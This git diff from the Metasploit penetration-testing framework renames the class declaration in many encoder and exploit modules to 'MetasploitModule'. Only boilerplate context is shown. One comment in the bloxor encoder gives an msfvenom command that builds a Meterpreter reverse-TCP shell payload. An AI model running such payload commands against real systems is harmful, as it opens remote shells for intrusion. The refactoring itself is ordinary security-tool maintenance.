b/modules/encoders/ppc/longxor.rb index 1621e2a3e8..b497b5ee11 100644 --- a/modules/encoders/ppc/longxor.rb +++ b/modules/encoders/ppc/longxor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/ppc/longxor_tag.rb b/modules/encoders/ppc/longxor_tag.rb index b0e6a90bd2..797d9cf259 100644 --- a/modules/encoders/ppc/longxor_tag.rb +++ b/modules/encoders/ppc/longxor_tag.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index 34995ec80e..02759315a5 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback def initialize super( diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb index 73586cccc7..fc4bcee4a1 100644 --- a/modules/encoders/x64/xor.rb +++ b/modules/encoders/x64/xor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/add_sub.rb b/modules/encoders/x86/add_sub.rb index 93c6c7a014..0175313484 100644 --- a/modules/encoders/x86/add_sub.rb +++ b/modules/encoders/x86/add_sub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb index 2376e6dd61..e89f4c30fa 100644 --- a/modules/encoders/x86/alpha_mixed.rb +++ b/modules/encoders/x86/alpha_mixed.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/encoder/alpha2/alpha_mixed' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = LowRanking def initialize diff --git a/modules/encoders/x86/alpha_upper.rb b/modules/encoders/x86/alpha_upper.rb index 0430d6f403..61703a9acb 100644 --- a/modules/encoders/x86/alpha_upper.rb +++ b/modules/encoders/x86/alpha_upper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/alpha_upper' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = LowRanking diff --git a/modules/encoders/x86/avoid_underscore_tolower.rb b/modules/encoders/x86/avoid_underscore_tolower.rb index 44180f5a9e..af1818e684 100644 --- a/modules/encoders/x86/avoid_underscore_tolower.rb +++ b/modules/encoders/x86/avoid_underscore_tolower.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, like the BufferOffset. diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index 238e87b60e..a90ee8a66b 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -88,7 +88,7 @@ require 'msf/core' # 0000004A 3401 xor al,0x1 # 0000004C 7F db 0x7F # -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, like the BufferOffset. diff --git a/modules/encoders/x86/bloxor.rb b/modules/encoders/x86/bloxor.rb index 52814983cd..b3ddd8612d 100644 --- a/modules/encoders/x86/bloxor.rb +++ b/modules/encoders/x86/bloxor.rb @@ -24,7 +24,7 @@ require 'rex/encoder/bloxor/bloxor' # >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 - # -class Metasploit3 < Rex::Encoder::BloXor +class MetasploitModule < Rex::Encoder::BloXor # Note: Currently set to manual, bump it up to automatically get selected by the framework. # Note: BloXor by design is slow due to its exhaustive search for a solution. diff --git a/modules/encoders/x86/bmp_polyglot.rb b/modules/encoders/x86/bmp_polyglot.rb index 6c834132f4..d758825bca 100644 --- a/modules/encoders/x86/bmp_polyglot.rb +++ b/modules/encoders/x86/bmp_polyglot.rb @@ -177,7 +177,7 @@ class SizeCalculator end -class Metasploit4 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index c49f4572a9..3a2bf89737 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index b354574539..9181b1786f 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the cpuid value is generated and supplied # manually... diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index 4de58d3824..c7ac475cd6 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the stat(2) key is generated and supplied # manually. diff --git a/modules/encoders/x86/context_time.rb b/modules/encoders/x86/context_time.rb index f5db335623..06ec12c266 100644 --- a/modules/encoders/x86/context_time.rb +++ b/modules/encoders/x86/context_time.rb @@ -6,7 +6,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Manual ranking because the time(2) key is generated and supplied # manually. diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb index 78faa90631..d90556073a 100644 --- a/modules/encoders/x86/countdown.rb +++ b/modules/encoders/x86/countdown.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb index f942c29eb9..685635f96a 100644 --- a/modules/encoders/x86/fnstenv_mov.rb +++ b/modules/encoders/x86/fnstenv_mov.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::Xor +class MetasploitModule < Msf::Encoder::Xor def initialize super( diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index 5a0b98d082..a0f9f7c2c0 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # Uncomment when we get the poly stuff working again. #Rank = GreatRanking diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb index b4e275351e..656adc6731 100644 --- a/modules/encoders/x86/nonalpha.rb +++ b/modules/encoders/x86/nonalpha.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/nonalpha' -class Metasploit3 < Msf::Encoder::NonAlpha +class MetasploitModule < Msf::Encoder::NonAlpha Rank = LowRanking diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb index 48a261b1f7..317b07b8bc 100644 --- a/modules/encoders/x86/nonupper.rb +++ b/modules/encoders/x86/nonupper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/nonupper' -class Metasploit3 < Msf::Encoder::NonUpper +class MetasploitModule < Msf::Encoder::NonUpper Rank = LowRanking diff --git a/modules/encoders/x86/opt_sub.rb b/modules/encoders/x86/opt_sub.rb index a28dbc3702..afab67fbee 100644 --- a/modules/encoders/x86/opt_sub.rb +++ b/modules/encoders/x86/opt_sub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder Rank = ManualRanking diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index 14487f60bc..76ff8908c9 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -8,7 +8,7 @@ require 'rex/poly' require 'msf/core' -class Metasploit3 < Msf::Encoder::XorAdditiveFeedback +class MetasploitModule < Msf::Encoder::XorAdditiveFeedback # The shikata encoder has an excellent ranking because it is polymorphic. # Party time, excellent! diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb index e4bb69f6d1..3cc1976a5c 100644 --- a/modules/encoders/x86/single_static_bit.rb +++ b/modules/encoders/x86/single_static_bit.rb @@ -12,7 +12,7 @@ require 'msf/core' # The decoder has been tested with all possible values, but the decoder stub # is was not designed to bypass restrictions other than "bit 5 must be on".. # -class Metasploit3 < Msf::Encoder +class MetasploitModule < Msf::Encoder # This encoder has a manual ranking because it should only be used in cases # where information has been explicitly supplied, specifically diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index 255f7f21d4..d33c46b153 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/unicode_mixed' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = ManualRanking diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index 821d6f5c92..d04c1b4bf6 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/encoder/alpha2/unicode_upper' -class Metasploit3 < Msf::Encoder::Alphanum +class MetasploitModule < Msf::Encoder::Alphanum Rank = ManualRanking diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb index 18f91d7ec9..f1b171b225 100644 --- a/modules/exploits/aix/local/ibstat_path.rb +++ b/modules/exploits/aix/local/ibstat_path.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb index ad11665a90..cae0405028 100644 --- a/modules/exploits/aix/rpc_cmsd_opcode21.rb +++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb index 3e8a17e173..758de4da37 100644 --- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/android/adb/adb_server_exec.rb b/modules/exploits/android/adb/adb_server_exec.rb index d1d13e601c..bc9e5eeefa 100644 --- a/modules/exploits/android/adb/adb_server_exec.rb +++ b/modules/exploits/android/adb/adb_server_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/adb' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/android/browser/samsung_knox_smdm_url.rb b/modules/exploits/android/browser/samsung_knox_smdm_url.rb index 5b3c906329..6eb7887d6f 100644 --- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb +++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'digest/md5' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 5da4b1aabc..8154bd8d76 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/android' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index 1ac2e4a2b6..3440245813 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -8,7 +8,7 @@ require 'msf/core/exploit/fileformat' require 'msf/core/exploit/pdf' require 'msf/core/exploit/android' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/android/local/futex_requeue.rb b/modules/exploits/android/local/futex_requeue.rb index 204bf8af5b..68d170b452 100644 --- a/modules/exploits/android/local/futex_requeue.rb +++ b/modules/exploits/android/local/futex_requeue.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/apple_ios/browser/safari_libtiff.rb b/modules/exploits/apple_ios/browser/safari_libtiff.rb index 1217a5735b..79316f8a10 100644 --- a/modules/exploits/apple_ios/browser/safari_libtiff.rb +++ b/modules/exploits/apple_ios/browser/safari_libtiff.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb index 99882d452c..25d7a2c2e1 100644 --- a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb +++ b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 2b6fdc0353..8b0143ea98 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index 6fe5362b96..a7c3cca617 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Brute diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index c4d398710d..7cef87bd46 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Dialup diff --git a/modules/exploits/firefox/local/exec_shellcode.rb b/modules/exploits/firefox/local/exec_shellcode.rb index 043290fb83..ebd888f488 100644 --- a/modules/exploits/firefox/local/exec_shellcode.rb +++ b/modules/exploits/firefox/local/exec_shellcode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/firefox' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index d7382725c1..9e103542ab 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb index 6a352d7bab..53e1d628aa 100644 --- a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb +++ b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb index e16a64a85c..8756789024 100644 --- a/modules/exploits/freebsd/local/mmap.rb +++ b/modules/exploits/freebsd/local/mmap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb index aa6f165b1b..bca3e3b626 100644 --- a/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb +++ b/modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local # It needs 3 minutes wait time # WfsDelay set to 180, so it should be a Manual exploit, # to avoid it being included in automations diff --git a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb index b204008a4a..77e8021592 100644 --- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb +++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/freebsd/samba/trans2open.rb b/modules/exploits/freebsd/samba/trans2open.rb index 56bb341327..b954027c17 100644 --- a/modules/exploits/freebsd/samba/trans2open.rb +++ b/modules/exploits/freebsd/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index c2b302d0a0..d58dd31fc0 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index 033eee1c4e..3b5e5ebea2 100644 --- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Telnet diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index 0a2b902014..c4bbe2df1b 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index b80a21d738..e07c08159b 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/antivirus/escan_password_exec.rb b/modules/exploits/linux/antivirus/escan_password_exec.rb index ed93ca2559..89a500c3ea 100644 --- a/modules/exploits/linux/antivirus/escan_password_exec.rb +++ b/modules/exploits/linux/antivirus/escan_password_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb index 5e2674723a..a783d4ed8f 100644 --- a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb +++ b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index b5c8c3d0e8..33b1920d30 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index 5891da9e62..fb7f6cf438 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking #include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 569747d8a1..caa3c9a700 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb index 6640a05340..45587d7b30 100644 --- a/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb +++ b/modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index cfc944d929..609ad4d5e2 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb index a64e532d2a..d8f1c3b530 100644 --- a/modules/exploits/linux/http/airties_login_cgi_bof.rb +++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index e3a9832d88..19557b6ae7 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Only interactive single commands supported include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 0805c4f7c4..caafb37989 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index e08ec2ccf0..5199a63285 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Configuration is overwritten and service reloaded include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/belkin_login_bof.rb b/modules/exploits/linux/http/belkin_login_bof.rb index 7ead5ddb5a..d530c09c05 100644 --- a/modules/exploits/linux/http/belkin_login_bof.rb +++ b/modules/exploits/linux/http/belkin_login_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/centreon_sqli_exec.rb b/modules/exploits/linux/http/centreon_sqli_exec.rb index 3ed353e001..e6c17a5254 100644 --- a/modules/exploits/linux/http/centreon_sqli_exec.rb +++ b/modules/exploits/linux/http/centreon_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb index 27d546f05b..a63ef51506 100644 --- a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb +++ b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index 0b43b461ad..36fdc4841d 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /DD-WRT/ ] } diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index d0fe19aec3..7b1cbbb6d3 